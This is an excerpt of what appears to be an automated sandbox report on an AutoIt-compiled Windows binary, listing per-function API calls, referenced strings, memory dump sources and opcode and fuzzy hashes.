                                                                                                                  • Opcode ID: 56aab45bf0fa76b9aa395dad74642206ead3bf53fa551c37c2c9f17d47b77d34
                                                                                                                  • Instruction ID: 35b3eb1043a47603891a743eeb2e0d09df438b1fab182d75e47dfc2315adf04b
                                                                                                                  • Opcode Fuzzy Hash: 56aab45bf0fa76b9aa395dad74642206ead3bf53fa551c37c2c9f17d47b77d34
                                                                                                                  • Instruction Fuzzy Hash: 6F912774600701AFDB14DF64C885B6ABBF5FF49710F24856DE94ADB291DBB0E841CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73BCF: _wcscpy.LIBCMT ref: 00D73BF2
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • __wcsnicmp.LIBCMT ref: 00DBE785
                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DBE84E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                  • String ID: LPT
                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                  • Opcode ID: 13318157f2604586044c780bc9b2aa6930aab94744344e8a3d1fdd0fdaa8696e
                                                                                                                  • Instruction ID: ecc1232e50adf762ee8d1e6913ed43cfe874cca653200635585895c707b3dc25
                                                                                                                  • Opcode Fuzzy Hash: 13318157f2604586044c780bc9b2aa6930aab94744344e8a3d1fdd0fdaa8696e
                                                                                                                  • Instruction Fuzzy Hash: 41616F75A00615EFCB14DB94C895EEEB7B5EF48310F04806AF546AB290EB70EE40DB71
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00D71B83
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00D71B9C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                  • Opcode ID: ca589f2b3d6aba23cf0ff7f9d0cdc5f45ea61c102531aae5f805f440a20181cc
                                                                                                                  • Instruction ID: 8551f5f5e464a7e795dc13746aa46f170f6cde1ab7fce591eda8756b3df1f470
                                                                                                                  • Opcode Fuzzy Hash: ca589f2b3d6aba23cf0ff7f9d0cdc5f45ea61c102531aae5f805f440a20181cc
                                                                                                                  • Instruction Fuzzy Hash: EA514571408744ABE320AF14D886BABBBECFF98354F81484DF2C8410A6EB71956DC762
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7417D: __fread_nolock.LIBCMT ref: 00D7419B
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBCF49
                                                                                                                  • _wcscmp.LIBCMT ref: 00DBCF5C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                  • String ID: FILE
                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                  • Opcode ID: 3f59f93adf93e5e03f408e8f8c7b6ea401655216219660463691998a410bcf18
                                                                                                                  • Instruction ID: 6f486c8a8c49e34e991b88c7378db4d43ffad450a7bc60dc60c9e9ee73344679
                                                                                                                  • Opcode Fuzzy Hash: 3f59f93adf93e5e03f408e8f8c7b6ea401655216219660463691998a410bcf18
                                                                                                                  • Instruction Fuzzy Hash: C741A432A10219BADF11ABA4CC41FEF7BBAEF89710F004469F615A7191DB719A448B70
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DDA668
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DDA67D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: '
                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                  • Opcode ID: 89878f66134e0a31ff9d43209afc8827e0c2dc4bce481d626c735247ceb9a711
                                                                                                                  • Instruction ID: 7739ef462b4efc47d1a084434b76d1bf4d467ef9931ddd5e9a5268a29700f462
                                                                                                                  • Opcode Fuzzy Hash: 89878f66134e0a31ff9d43209afc8827e0c2dc4bce481d626c735247ceb9a711
                                                                                                                  • Instruction Fuzzy Hash: 4241E375A00209DFDB14CFA9D881BDA7BB9FB09300F14846AE909EB381D770E945CFA1
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DC57E7
                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00DC581D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                  • String ID: |
                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                  • Opcode ID: a0fdeef25f19198e23f3e05aa4e1bf014362c00517a51c61e187792f3d7a390a
                                                                                                                  • Instruction ID: 1977d82a56d873e19ddd29af90523ba65c9a456ddc05b85f4dd6aac390cd273a
                                                                                                                  • Opcode Fuzzy Hash: a0fdeef25f19198e23f3e05aa4e1bf014362c00517a51c61e187792f3d7a390a
                                                                                                                  • Instruction Fuzzy Hash: 19313D7180021AEBCF11AFA1DC55EEE7FB9FF18350F108019F815A6165EB319956DB70
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00DD961B
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DD9657
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                  • Opcode ID: 2706f3531a5710862cb1d15d0bf9e04cfa4aaa30acd56a559ed63c04936813a2
                                                                                                                  • Instruction ID: 0adac49cb1d2341627e342ada74b76f22aea75777ef1f83156b212d4c1f1008a
                                                                                                                  • Opcode Fuzzy Hash: 2706f3531a5710862cb1d15d0bf9e04cfa4aaa30acd56a559ed63c04936813a2
                                                                                                                  • Instruction Fuzzy Hash: E2319E31500604AEEB109F64DC91FBBB7A9FF58764F04961AF9A9C7290CA31AC81DB74
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5BE4
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DB5C1F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: 2ba334b174c37849e60cfd13b003da14502fb71895850071eb2fa5d9beb8a990
                                                                                                                  • Instruction ID: 986cea605494874e22d99922934698405c4ebdc9fe83dced52ca0290b1944db7
                                                                                                                  • Opcode Fuzzy Hash: 2ba334b174c37849e60cfd13b003da14502fb71895850071eb2fa5d9beb8a990
                                                                                                                  • Instruction Fuzzy Hash: FD318231500709EBDB248F99E985BEEBFF6EF05350F1C4019E986961A4D7B09944CB30
                                                                                                                  APIs
                                                                                                                  • __snwprintf.LIBCMT ref: 00DC6BDD
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DD9269
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DD9274
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Combobox
                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                    • Part of subcall function 00D8C619: GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                    • Part of subcall function 00D8C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00DD9775
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00DD978F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00DD94A6
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DD94B5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5CF3
                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00DB5D12
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DC544C
                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DC5475
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                  • String ID: <local>
                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DA4557
                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00DA463E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 3761405300-2982846942
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonsinet_addr
                                                                                                                  • String ID: 255.255.255.255
                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DAC5E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                  • String ID: EA06
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DAC4E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DAC562
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                  • String ID: #32770
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DAB36B
                                                                                                                    • Part of subcall function 00D92011: _doexit.LIBCMT ref: 00D9201B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Message_doexit
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00DEBAB8
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00DEBCAB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                  • String ID: WIN_XPe
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DD84DF
                                                                                                                  • PostMessageW.USER32(00000000), ref: 00DD84E6
                                                                                                                    • Part of subcall function 00DB8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB83CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DD849F
                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DD84B2
                                                                                                                    • Part of subcall function 00DB8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB83CD
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00DBD01E
                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00DBD035
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                  • String ID: aut
                                                                                                                  • API String ID: 3285503233-3010740371